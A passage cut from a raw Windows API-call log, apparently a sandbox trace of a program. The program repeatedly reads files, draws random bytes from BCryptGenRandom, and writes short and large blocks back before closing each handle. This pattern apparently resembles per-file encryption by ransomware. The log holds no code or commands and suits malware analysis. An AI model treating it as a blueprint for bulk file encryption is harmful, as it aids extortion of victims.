out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.422] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x15fef, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.426] CloseHandle (hObject=0x308) returned 1 [0160.426] free (_Block=0x3df0008) [0160.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0160.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0160.437] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.437] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.437] free (_Block=0x3e305b8) [0160.437] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.437] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.438] free (_Block=0x1fa91d0) [0160.438] free (_Block=0x1fa2ed8) [0160.438] free (_Block=0x1fa90b8) [0160.438] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.439] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a9f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.440] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.451] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x193e7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.466] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x14f8a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0160.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.467] CloseHandle (hObject=0x308) returned 1 [0160.467] free (_Block=0x3df0008) [0160.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.477] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0160.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0160.478] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.478] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.478] free (_Block=0x3e305b8) [0160.478] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.478] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.479] free (_Block=0x1fa91d0) [0160.479] free (_Block=0x1fa2ed8) [0160.479] free (_Block=0x1fa90b8) [0160.479] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.482] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1a400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.483] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.484] CloseHandle (hObject=0x308) returned 1 [0160.484] free (_Block=0x3df0008) [0160.484] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0160.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0160.524] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.524] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.524] free (_Block=0x3e305b8) [0160.524] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.524] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.524] free (_Block=0x1fa91d0) [0160.524] free (_Block=0x1fa2ed8) [0160.524] free (_Block=0x1fa90b8) [0160.524] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.741] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x18ad0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.744] CloseHandle (hObject=0x308) returned 1 [0160.744] free (_Block=0x3df0008) [0160.744] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0160.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0160.755] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.755] free (_Block=0x3e305b8) [0160.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.755] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.755] free (_Block=0x1fa91d0) [0160.755] free (_Block=0x1fa2ed8) [0160.755] free (_Block=0x1fa90b8) [0160.755] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.764] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1bf00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.767] CloseHandle (hObject=0x308) returned 1 [0160.767] free (_Block=0x3df0008) [0160.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.801] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0160.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0160.803] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.803] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.803] free (_Block=0x3e305b8) [0160.803] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.803] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.804] free (_Block=0x1fa91d0) [0160.804] free (_Block=0x1fa2ed8) [0160.804] free (_Block=0x1fa90b8) [0160.804] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.805] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.807] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x17df0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.809] CloseHandle (hObject=0x308) returned 1 [0160.809] free (_Block=0x3df0008) [0160.809] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.818] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0160.819] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0160.819] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.819] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.820] free (_Block=0x3e305b8) [0160.820] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.820] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.820] free (_Block=0x1fa91d0) [0160.820] free (_Block=0x1fa2ed8) [0160.820] free (_Block=0x1fa90b8) [0160.820] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.821] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.823] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1bb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.823] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.825] CloseHandle (hObject=0x308) returned 1 [0160.825] free (_Block=0x3df0008) [0160.825] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0160.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0160.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0160.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0160.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0160.835] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0160.835] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0160.835] free (_Block=0x3e305b8) [0160.835] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0160.835] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0160.836] free (_Block=0x1fa91d0) [0160.836] free (_Block=0x1fa2ed8) [0160.836] free (_Block=0x1fa90b8) [0160.836] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0160.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.117] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x18890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.121] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.126] CloseHandle (hObject=0x308) returned 1 [0161.126] free (_Block=0x3df0008) [0161.127] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.136] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.137] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.137] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.138] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.138] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.138] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.138] free (_Block=0x3e305b8) [0161.138] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.138] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.139] free (_Block=0x1fa91d0) [0161.139] free (_Block=0x1fa2ed8) [0161.139] free (_Block=0x1fa90b8) [0161.139] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.142] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x16d10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.142] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.143] CloseHandle (hObject=0x308) returned 1 [0161.144] free (_Block=0x3df0008) [0161.144] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.154] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.154] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.154] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.155] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.155] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.155] free (_Block=0x3e305b8) [0161.155] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.155] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.156] free (_Block=0x1fa91d0) [0161.156] free (_Block=0x1fa2ed8) [0161.156] free (_Block=0x1fa90b8) [0161.156] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.156] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.158] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1b760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0161.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.178] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1779f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.180] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0161.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0161.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0161.194] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0161.194] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0161.194] free (_Block=0x3e305b8) [0161.194] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0161.194] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0161.194] free (_Block=0x1fa91d0) [0161.194] free (_Block=0x1fa2ed8) [0161.194] free (_Block=0x1fa90b8) [0161.194] 